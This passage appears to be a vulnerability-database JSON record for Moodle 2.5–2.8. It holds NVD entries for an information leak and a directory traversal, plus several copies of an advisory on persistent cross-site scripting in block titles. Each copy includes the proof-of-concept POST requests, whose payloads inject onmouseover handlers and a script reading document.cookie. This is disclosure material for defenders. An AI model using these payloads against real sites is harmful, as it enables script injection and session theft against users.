"cpe:2.3:a:moodle:moodle:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:02", "description": "lib/moodlelib.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4, when the theme uses the blocks-regions feature, establishes the course state at an incorrect point in the login-validation process, which allows remote attackers to obtain sensitive course information via unspecified vectors.", "edition": 6, "cvss3": {}, "published": "2015-06-01T19:59:00", "title": "CVE-2015-2270", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2270"], "modified": "2020-12-01T14:54:00", "cpe": ["cpe:/a:moodle:moodle:2.6.4", "cpe:/a:moodle:moodle:2.6.2", "cpe:/a:moodle:moodle:2.7.2", "cpe:/a:moodle:moodle:2.5.6", "cpe:/a:moodle:moodle:2.8.3", "cpe:/a:moodle:moodle:2.8.2", "cpe:/a:moodle:moodle:2.7.0", "cpe:/a:moodle:moodle:2.6.5", "cpe:/a:moodle:moodle:2.5.7", "cpe:/a:moodle:moodle:2.7.1", "cpe:/a:moodle:moodle:2.8.0", "cpe:/a:moodle:moodle:2.6.6", "cpe:/a:moodle:moodle:2.5.5", "cpe:/a:moodle:moodle:2.5.0", "cpe:/a:moodle:moodle:2.5.8", "cpe:/a:moodle:moodle:2.5.2", "cpe:/a:moodle:moodle:2.6.0", "cpe:/a:moodle:moodle:2.6.3", "cpe:/a:moodle:moodle:2.7.5", "cpe:/a:moodle:moodle:2.5.4", "cpe:/a:moodle:moodle:2.5.9", "cpe:/a:moodle:moodle:2.5.3", "cpe:/a:moodle:moodle:2.7.4", "cpe:/a:moodle:moodle:2.5.1", "cpe:/a:moodle:moodle:2.8.1", "cpe:/a:moodle:moodle:2.6.8", "cpe:/a:moodle:moodle:2.6.7", "cpe:/a:moodle:moodle:2.7.3", "cpe:/a:moodle:moodle:2.6.1"], "id": "CVE-2015-2270", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2270", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:01", "description": "Directory traversal vulnerability in the min_get_slash_argument function in lib/configonlylib.php in Moodle through 2.5.9, 2.6.x before 2.6.8, 2.7.x before 2.7.5, and 2.8.x before 2.8.3 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter, as demonstrated by reading PHP scripts.", "edition": 6, "cvss3": {}, "published": "2015-06-01T19:59:00", "title": "CVE-2015-1493", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1493"], "modified": "2020-12-01T14:54:00", "cpe": ["cpe:/a:moodle:moodle:2.6.4", "cpe:/a:moodle:moodle:2.6.2", "cpe:/a:moodle:moodle:2.7.2", "cpe:/a:moodle:moodle:2.5.6", "cpe:/a:moodle:moodle:2.8.2", "cpe:/a:moodle:moodle:2.7.0", "cpe:/a:moodle:moodle:2.6.5", "cpe:/a:moodle:moodle:2.5.7", "cpe:/a:moodle:moodle:2.7.1", "cpe:/a:moodle:moodle:2.8.0", "cpe:/a:moodle:moodle:2.6.6", "cpe:/a:moodle:moodle:2.5.5", "cpe:/a:moodle:moodle:2.5.0", "cpe:/a:moodle:moodle:2.5.8", "cpe:/a:moodle:moodle:2.5.2", "cpe:/a:moodle:moodle:2.6.0", "cpe:/a:moodle:moodle:2.6.3", "cpe:/a:moodle:moodle:2.5.4", "cpe:/a:moodle:moodle:2.5.9", "cpe:/a:moodle:moodle:2.5.3", "cpe:/a:moodle:moodle:2.7.4", "cpe:/a:moodle:moodle:2.5.1", "cpe:/a:moodle:moodle:2.8.1", "cpe:/a:moodle:moodle:2.6.8", "cpe:/a:moodle:moodle:2.6.7", "cpe:/a:moodle:moodle:2.7.3", "cpe:/a:moodle:moodle:2.6.1"], "id": "CVE-2015-1493", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1493", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.3:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-04T03:28:10", "description": "Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting. CVE-2015-2269. Webapps exploit for php platform", "published": "2015-03-17T00:00:00", "type": "exploitdb", "title": "Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2269"], "modified": "2015-03-17T00:00:00", "id": "EDB-ID:36418", "href": "https://www.exploit-db.com/exploits/36418/", "sourceData": "\r\nMoodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting\r\n\r\n\r\nVendor: Moodle Pty Ltd\r\nProduct web page: https://www.moodle.org\r\nAffected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9\r\n\r\nSummary: Moodle is a learning platform designed to provide\r\neducators, administrators and learners with a single robust,\r\nsecure and integrated system to create personalised learning\r\nenvironments.\r\n\r\nDesc: Moodle suffers from persistent XSS vulnerabilities. Input\r\npassed to the POST parameters 'config_title' and 'title' thru\r\nindex.php, are not properly sanitized allowing the attacker to\r\nexecute HTML or JS code into user's browser session on the affected\r\nsite. Affected components: Blocks, Glossary, RSS and Tags.\r\n\r\nTested on: nginx\r\n PHP/5.4.22\r\n\r\n\r\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2015-5236\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php\r\n\r\nVendor Advisory ID: MSA-15-0013\r\nVendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383\r\n\r\nCVE ID: CVE-2015-2269\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269\r\n\r\n\r\n09.02.2015\r\n\r\n--\r\n\r\n\r\nRandom Glossary Entry\r\n---------------------\r\n\r\nPOST http://WEB/my/index.php HTTP/1.1\r\n\r\n\r\n_qf__block_glossary_random_edit_form=1\r\nbui_contexts=0\r\nbui_defaultregion=side-pre\r\nbui_defaultweight=4\r\nbui_editid=304\r\nbui_editingatfrontpage=0\r\nbui_pagetypepattern=my-index\r\nbui_parentcontextid=411\r\nbui_region=side-pre\r\nbui_subpagepattern=%@NULL@%\r\nbui_visible=1\r\nbui_weight=4\r\nconfig_addentry=test\r\nconfig_invisible=test2\r\nconfig_refresh=0\r\nconfig_showconcept=1\r\nconfig_title=\" onmouseover=prompt(\"XSS1\") >\r\nconfig_type=0\r\nconfig_viewglossary=test3\r\nmform_isexpanded_id_configheader=1\r\nmform_isexpanded_id_onthispage=0\r\nmform_isexpanded_id_whereheader=0\r\nsesskey=S8TXvxdEKF\r\nsubmitbutton=Save changes\r\n\r\n\r\nRemote RSS Feeds\r\n----------------\r\n\r\nPOST http://WEB/my/index.php HTTP/1.1\r\n\r\n\r\n_qf__block_rss_client_edit_form=1\r\nbui_contexts=0\r\nbui_defaultregion=side-pre\r\nbui_defaultweight=4\r\nbui_editid=312\r\nbui_editingatfrontpage=0\r\nbui_pagetypepattern=my-index\r\nbui_parentcontextid=411\r\nbui_region=side-pre\r\nbui_subpagepattern=%@NULL@%\r\nbui_visible=1\r\nbui_weight=4\r\nconfig_block_rss_client_show_channel_image=0\r\nconfig_block_rss_client_show_channel_link=0\r\nconfig_display_description=0\r\nconfig_rssid=_qf__force_multiselect_submission\r\nconfig_rssid[]=3\r\nconfig_shownumentries=11\r\nconfig_title=\" onmouseover=prompt(\"XSS2\") >\r\nmform_isexpanded_id_configheader=1\r\nmform_isexpanded_id_onthispage=0\r\nmform_isexpanded_id_whereheader=0\r\nsesskey=S8TXvxdEKF\r\nsubmitbutton=Save changes\r\n\r\n\r\nTags\r\n----\r\n\r\nPOST http://WEB/my/index.php HTTP/1.1\r\n\r\n\r\n_qf__block_tags_edit_form=1\r\nbui_contexts=0\r\nbui_defaultregion=side-pre\r\nbui_defaultweight=4\r\nbui_editid=313\r\nbui_editingatfrontpage=0\r\nbui_pagetypepattern=my-index\r\nbui_parentcontextid=411\r\nbui_region=side-pre\r\nbui_subpagepattern=%@NULL@%\r\nbui_visible=1\r\nbui_weight=4\r\nconfig_numberoftags=80\r\nconfig_tagtype=\r\nconfig_title=Tags\" onmouseover=prompt(\"XSS3\") >\r\nmform_isexpanded_id_configheader=1\r\nmform_isexpanded_id_onthispage=0\r\nmform_isexpanded_id_whereheader=0\r\nsesskey=S8TXvxdEKF\r\nsubmitbutton=Save changes\r\n\r\n\r\nOlder not supported versions\r\n----------------------------\r\n\r\nPOST http://WEB/blog/index.php HTTP/1.1\r\n\r\nblockaction=config\r\nfilterselect=1343\r\nfiltertype=user\r\ninstanceid=4992\r\nnumberoftags=20\r\nsesskey=0QCG5LQz0Q\r\nsort=name\r\ntimewithin=90\r\ntitle=ZSL\"><script>alert(document.cookie);</script>\r\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/36418/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:35", "description": "\nMoodle 2.5.92.6.82.7.52.8.3 - Block Title Handler Cross-Site Scripting", "edition": 1, "published": "2015-03-17T00:00:00", "title": "Moodle 2.5.92.6.82.7.52.8.3 - Block Title Handler Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2269"], "modified": "2015-03-17T00:00:00", "id": "EXPLOITPACK:5B59BDED7A2F1B9EC3BDFA6E973A9C07", "href": "", "sourceData": "\ufeff\nMoodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting\n\n\nVendor: Moodle Pty Ltd\nProduct web page: https://www.moodle.org\nAffected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9\n\nSummary: Moodle is a learning platform designed to provide\neducators, administrators and learners with a single robust,\nsecure and integrated system to create personalised learning\nenvironments.\n\nDesc: Moodle suffers from persistent XSS vulnerabilities. Input\npassed to the POST parameters 'config_title' and 'title' thru\nindex.php, are not properly sanitized allowing the attacker to\nexecute HTML or JS code into user's browser session on the affected\nsite. Affected components: Blocks, Glossary, RSS and Tags.\n\nTested on: nginx\n PHP/5.4.22\n\n\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2015-5236\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php\n\nVendor Advisory ID: MSA-15-0013\nVendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383\n\nCVE ID: CVE-2015-2269\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269\n\n\n09.02.2015\n\n--\n\n\nRandom Glossary Entry\n---------------------\n\nPOST http://WEB/my/index.php HTTP/1.1\n\n\n_qf__block_glossary_random_edit_form=1\nbui_contexts=0\nbui_defaultregion=side-pre\nbui_defaultweight=4\nbui_editid=304\nbui_editingatfrontpage=0\nbui_pagetypepattern=my-index\nbui_parentcontextid=411\nbui_region=side-pre\nbui_subpagepattern=%@NULL@%\nbui_visible=1\nbui_weight=4\nconfig_addentry=test\nconfig_invisible=test2\nconfig_refresh=0\nconfig_showconcept=1\nconfig_title=\" onmouseover=prompt(\"XSS1\") >\nconfig_type=0\nconfig_viewglossary=test3\nmform_isexpanded_id_configheader=1\nmform_isexpanded_id_onthispage=0\nmform_isexpanded_id_whereheader=0\nsesskey=S8TXvxdEKF\nsubmitbutton=Save changes\n\n\nRemote RSS Feeds\n----------------\n\nPOST http://WEB/my/index.php HTTP/1.1\n\n\n_qf__block_rss_client_edit_form=1\nbui_contexts=0\nbui_defaultregion=side-pre\nbui_defaultweight=4\nbui_editid=312\nbui_editingatfrontpage=0\nbui_pagetypepattern=my-index\nbui_parentcontextid=411\nbui_region=side-pre\nbui_subpagepattern=%@NULL@%\nbui_visible=1\nbui_weight=4\nconfig_block_rss_client_show_channel_image=0\nconfig_block_rss_client_show_channel_link=0\nconfig_display_description=0\nconfig_rssid=_qf__force_multiselect_submission\nconfig_rssid[]=3\nconfig_shownumentries=11\nconfig_title=\" onmouseover=prompt(\"XSS2\") >\nmform_isexpanded_id_configheader=1\nmform_isexpanded_id_onthispage=0\nmform_isexpanded_id_whereheader=0\nsesskey=S8TXvxdEKF\nsubmitbutton=Save changes\n\n\nTags\n----\n\nPOST http://WEB/my/index.php HTTP/1.1\n\n\n_qf__block_tags_edit_form=1\nbui_contexts=0\nbui_defaultregion=side-pre\nbui_defaultweight=4\nbui_editid=313\nbui_editingatfrontpage=0\nbui_pagetypepattern=my-index\nbui_parentcontextid=411\nbui_region=side-pre\nbui_subpagepattern=%@NULL@%\nbui_visible=1\nbui_weight=4\nconfig_numberoftags=80\nconfig_tagtype=\nconfig_title=Tags\" onmouseover=prompt(\"XSS3\") >\nmform_isexpanded_id_configheader=1\nmform_isexpanded_id_onthispage=0\nmform_isexpanded_id_whereheader=0\nsesskey=S8TXvxdEKF\nsubmitbutton=Save changes\n\n\nOlder not supported versions\n----------------------------\n\nPOST http://WEB/blog/index.php HTTP/1.1\n\nblockaction=config\nfilterselect=1343\nfiltertype=user\ninstanceid=4992\nnumberoftags=20\nsesskey=0QCG5LQz0Q\nsort=name\ntimewithin=90\ntitle=ZSL\"><script>alert(document.cookie);</script>", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:33", "description": "", "published": "2015-03-17T00:00:00", "type": "packetstorm", "title": "Moodle 2.5.9 / 2.6.8 / 2.7.5 / 2.8.3 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2269"], "modified": "2015-03-17T00:00:00", "id": "PACKETSTORM:130865", "href": "https://packetstormsecurity.com/files/130865/Moodle-2.5.9-2.6.8-2.7.5-2.8.3-Cross-Site-Scripting.html", "sourceData": "`\ufeff \nMoodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting \n \n \nVendor: Moodle Pty Ltd \nProduct web page: https://www.moodle.org \nAffected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9 \n \nSummary: Moodle is a learning platform designed to provide \neducators, administrators and learners with a single robust, \nsecure and integrated system to create personalised learning \nenvironments. \n \nDesc: Moodle suffers from persistent XSS vulnerabilities. Input \npassed to the POST parameters 'config_title' and 'title' thru \nindex.php, are not properly sanitized allowing the attacker to \nexecute HTML or JS code into user's browser session on the affected \nsite. Affected components: Blocks, Glossary, RSS and Tags. \n \nTested on: nginx \nPHP/5.4.22 \n \n \nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic \n@zeroscience \n \n \nAdvisory ID: ZSL-2015-5236 \nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php \n \nVendor Advisory ID: MSA-15-0013 \nVendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383 \n \nCVE ID: CVE-2015-2269 \nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269 \n \n \n09.02.2015 \n \n-- \n \n \nRandom Glossary Entry \n--------------------- \n \nPOST http://WEB/my/index.php HTTP/1.1 \n \n \n_qf__block_glossary_random_edit_form=1 \nbui_contexts=0 \nbui_defaultregion=side-pre \nbui_defaultweight=4 \nbui_editid=304 \nbui_editingatfrontpage=0 \nbui_pagetypepattern=my-index \nbui_parentcontextid=411 \nbui_region=side-pre \nbui_subpagepattern=%@NULL@% \nbui_visible=1 \nbui_weight=4 \nconfig_addentry=test \nconfig_invisible=test2 \nconfig_refresh=0 \nconfig_showconcept=1 \nconfig_title=\" onmouseover=prompt(\"XSS1\") > \nconfig_type=0 \nconfig_viewglossary=test3 \nmform_isexpanded_id_configheader=1 \nmform_isexpanded_id_onthispage=0 \nmform_isexpanded_id_whereheader=0 \nsesskey=S8TXvxdEKF \nsubmitbutton=Save changes \n \n \nRemote RSS Feeds \n---------------- \n \nPOST http://WEB/my/index.php HTTP/1.1 \n \n \n_qf__block_rss_client_edit_form=1 \nbui_contexts=0 \nbui_defaultregion=side-pre \nbui_defaultweight=4 \nbui_editid=312 \nbui_editingatfrontpage=0 \nbui_pagetypepattern=my-index \nbui_parentcontextid=411 \nbui_region=side-pre \nbui_subpagepattern=%@NULL@% \nbui_visible=1 \nbui_weight=4 \nconfig_block_rss_client_show_channel_image=0 \nconfig_block_rss_client_show_channel_link=0 \nconfig_display_description=0 \nconfig_rssid=_qf__force_multiselect_submission \nconfig_rssid[]=3 \nconfig_shownumentries=11 \nconfig_title=\" onmouseover=prompt(\"XSS2\") > \nmform_isexpanded_id_configheader=1 \nmform_isexpanded_id_onthispage=0 \nmform_isexpanded_id_whereheader=0 \nsesskey=S8TXvxdEKF \nsubmitbutton=Save changes \n \n \nTags \n---- \n \nPOST http://WEB/my/index.php HTTP/1.1 \n \n \n_qf__block_tags_edit_form=1 \nbui_contexts=0 \nbui_defaultregion=side-pre \nbui_defaultweight=4 \nbui_editid=313 \nbui_editingatfrontpage=0 \nbui_pagetypepattern=my-index \nbui_parentcontextid=411 \nbui_region=side-pre \nbui_subpagepattern=%@NULL@% \nbui_visible=1 \nbui_weight=4 \nconfig_numberoftags=80 \nconfig_tagtype= \nconfig_title=Tags\" onmouseover=prompt(\"XSS3\") > \nmform_isexpanded_id_configheader=1 \nmform_isexpanded_id_onthispage=0 \nmform_isexpanded_id_whereheader=0 \nsesskey=S8TXvxdEKF \nsubmitbutton=Save changes \n \n \nOlder not supported versions \n---------------------------- \n \nPOST http://WEB/blog/index.php HTTP/1.1 \n \nblockaction=config \nfilterselect=1343 \nfiltertype=user \ninstanceid=4992 \nnumberoftags=20 \nsesskey=0QCG5LQz0Q \nsort=name \ntimewithin=90 \ntitle=ZSL\"><script>alert(document.cookie);</script> \n`\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130865/ZSL-2015-5236.txt"}], "zeroscience": [{"lastseen": "2020-11-06T21:18:06", "description": "Title: Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting \nAdvisory ID: [ZSL-2015-5236](<ZSL-2015-5236.php>) \nType: Local/Remote \nImpact: Cross-Site Scripting \nRisk: (3/5) \nRelease Date: 16.03.2015 \n\n\n##### Summary\n\nMoodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. \n\n##### Description\n\nMoodle suffers from persistent XSS vulnerabilities. Input passed to the POST parameters 'config_title' and 'title' thru index.php, are not properly sanitized allowing the attacker to execute HTML or JS code into user's browser session on the affected site. Affected components: Blocks, Glossary, RSS and Tags. \n\n##### Vendor\n\nMoodle Pty Ltd - <https://www.moodle.org>\n\n##### Affected Version\n\n2.8.3, 2.7.5, 2.6.8 and 2.5.9 \n\n##### Tested On\n\nnginx \nPHP/5.4.22 \n\n##### Vendor Status\n\n[09.02.2015] Vulnerability discovered. \n[09.02.2015] Vendor informed. \n[09.02.2015] Vendor assigns tracker issue as MDL-49144. \n[10.02.2015] Vendor confirms the vulnerability. \n[10.02.2015] Vendor working on fix. \n[17.02.2015] Asked vendor for scheduled patch release date. \n[17.02.2015] Vendor replies. \n[02.03.2015] Vendor develops fix, review of fix integration started. \n[05.03.2015] Fix tested and verified by vendor. \n[09.03.2015] Vendor releases versions 2.6.9, 2.7.6 and 2.8.4 to address this issue. \n[16.03.2015] Vendor releases security advisory MSA-15-0013. \n[16.03.2015] Coordinated public security advisory released. \n\n##### PoC\n\n[moodle_xss.txt](<../../codes/moodle_xss.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://moodle.org/mod/forum/discuss.php?d=307383> \n[2] <https://tracker.moodle.org/browse/MDL-49144> \n[3] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269> \n[4] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2269> \n[5] <http://www.scip.ch/en/?vuldb.74008> \n[6] <https://exchange.xforce.ibmcloud.com/#/vulnerabilities/101557> \n[7] <http://www.exploit-db.com/exploits/36418/> \n[8] <http://osvdb.org/show/osvdb/119617> \n[9] <http://packetstormsecurity.com/files/130865> \n[10] <http://cxsecurity.com/issue/WLB-2015030118>\n\n##### Changelog\n\n[16.03.2015] - Initial release \n[17.03.2015] - Added reference [7] and [8] \n[18.03.2015] - Added reference [9] and [10] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 12, "published": "2015-03-16T00:00:00", "title": "Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting", "type": "zeroscience", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2269"], "modified": "2015-03-16T00:00:00", "id": "ZSL-2015-5236", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php", "sourceData": "\u00ef\u00bb\u00bf\r\nMoodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting\r\n\r\n\r\nVendor: Moodle Pty Ltd\r\nProduct web page: https://www.moodle.org\r\nAffected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9\r\n\r\nSummary: Moodle is a learning platform designed to provide\r\neducators, administrators and learners with a single robust,\r\nsecure and integrated system to create personalised learning\r\nenvironments.\r\n\r\nDesc: Moodle suffers from persistent XSS vulnerabilities. Input\r\npassed to the POST parameters 'config_title' and 'title' thru\r\nindex.php, are not properly sanitized allowing the attacker to\r\nexecute HTML or JS code into user's browser session on the affected\r\nsite. Affected components: Blocks, Glossary, RSS and Tags.\r\n\r\nTested on: nginx\r\n PHP/5.4.22\r\n\r\n\r\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2015-5236\r\nAdvisory URL: 